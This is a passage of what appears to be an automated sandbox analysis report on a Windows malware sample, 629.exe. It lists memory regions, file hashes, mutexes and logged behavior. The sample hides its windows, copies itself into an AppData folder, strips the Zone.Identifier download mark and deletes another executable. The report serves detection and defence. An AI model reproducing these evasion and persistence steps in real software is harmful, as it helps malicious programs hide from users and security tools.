| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\629.exe | os_pid = 0xb48, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 |
Module (16)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\629.exe, file_name_orig = C:\Users\aETAdzjz\629.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd38 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd58 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEMA78 |
|
1 | |
| Create | mutex_name = PEMB3C |
|
1 |
Process #6: 629.exe
68
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\aetadzjz\629.exe |
| Command Line | "C:\Users\aETAdzjz\629.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:15, Reason: Child Process |
| Unmonitor | End Time: 00:01:30, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb48 |
| Parent PID | 0xb3c (c:\users\aetadzjz\629.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B4C
0x
878
0x
398
0x
210
0x
894
0x
890
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002c9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0030ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00317fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00327fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00321fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x003f0000 | 0x003f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| 629.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00840fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00873fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00851fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00866fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00871fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x01d6efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01daffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01db0000 | 0x0207efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x0216ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000020c0000 | 0x020c0000 | 0x020c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x020d0000 | 0x020d3fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x020d0000 | 0x020d3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x020e0000 | 0x020fffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002100000 | 0x02100000 | 0x02100fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x02110000 | 0x02113fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002120000 | 0x02120000 | 0x02120fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x0216ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x0226ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002370000 | 0x02370000 | 0x02762fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02770000 | 0x0279ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x027a0000 | 0x02805fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0284ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0294ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| propsys.dll | 0x74be0000 | 0x74cd4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74ce0000 | 0x74e7dfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74fa0000 | 0x7501ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75080000 | 0x750bafff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x750c0000 | 0x750e0fff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75220000 | 0x75235fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75290000 | 0x752a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x752f0000 | 0x752fdfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75520000 | 0x75531fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75b10000 | 0x75b54fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75d70000 | 0x75f0cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x762c0000 | 0x762e6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\629.exe | 144.00 KB |
MD5:
02ee3587135f33d8b7bff25b34260089
SHA1: 3f4b9a41b65d9f155ac43260ac8f25857e656c61 SHA256: d138b4bc0dafd951ab483196984d648ce96eb092262fdc8baf94991725bdb0ea SSDeep: 3072:5SnHpm9x+scCgsrv8k2WoB0aodZzyEeYo40Zs+AMQA:GpEx+s/gGvB2WjzjeYo4a |
|
|
| C:\Users\aETAdzjz\AppData\Local\zipwcs\ushHer04rO2OqyUQI7w.exe | 144.00 KB |
MD5:
b922796295147cdde8292ece2ccf8c2e
SHA1: 89309f2c3118c33d8608a5bd698e84cff3f311d4 SHA256: 2dc18b533e82b6bfe4ca849a61197806714d541d8a77ad8feeb02342baa83854 SSDeep: 1536:ZxmjQOuNIovctrkyZD+ZQOkPn73i+i2DEcZJhW2lJFBclDS0+7GFU6Vxsik5docW:iWCovctrd+UPn7y+rE85lJF8Uq6WnLf |
|
|
Host Behavior
File (12)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\629.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Local\zipwcs\ | - |
|
1 | |
| Get Info | C:\Users\aETAdzjz\629.exe | type = size |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\zipwcs\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | source_filename = C:\Users\aETAdzjz\629.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\mddefwmerged\mddefwmerged.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe:Zone.Identifier | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | os_pid = 0x474, show_window = SW_HIDE |
|
1 |
Module (23)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Load | user32.dll | base_address = 0x76380000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75390000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76770000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\629.exe | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\629.exe, file_name_orig = C:\Users\aETAdzjz\629.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd38 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd58 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\629.exe | filename = C:\Users\aETAdzjz\629.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\aETAdzjz\629.exe | process_name = c:\users\aetadzjz\629.exe, desired_access = FILE_MAP_READ |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (14)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 134628 |
|
3 | |
| Get Time | type = Ticks, time = 135642 |
|
1 | |
| Get Time | type = Ticks, time = 136656 |
|
1 | |
| Get Time | type = Ticks, time = 137670 |
|
1 | |
| Get Time | type = Ticks, time = 138684 |
|
1 | |
| Get Time | type = Ticks, time = 139698 |
|
1 | |
| Get Time | type = Ticks, time = 140712 |
|
1 | |
| Get Time | type = Ticks, time = 141726 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Mutex (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEMB3C |
|
1 | |
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Process #7: zipwcs.exe
31
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:01:29, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x474 |
| Parent PID | 0xb48 (c:\users\aetadzjz\629.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
320
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00359fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00379fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0039ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| 629.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x01d6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01e80000 | 0x0214efff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | os_pid = 0x88c, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 |
Module (16)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
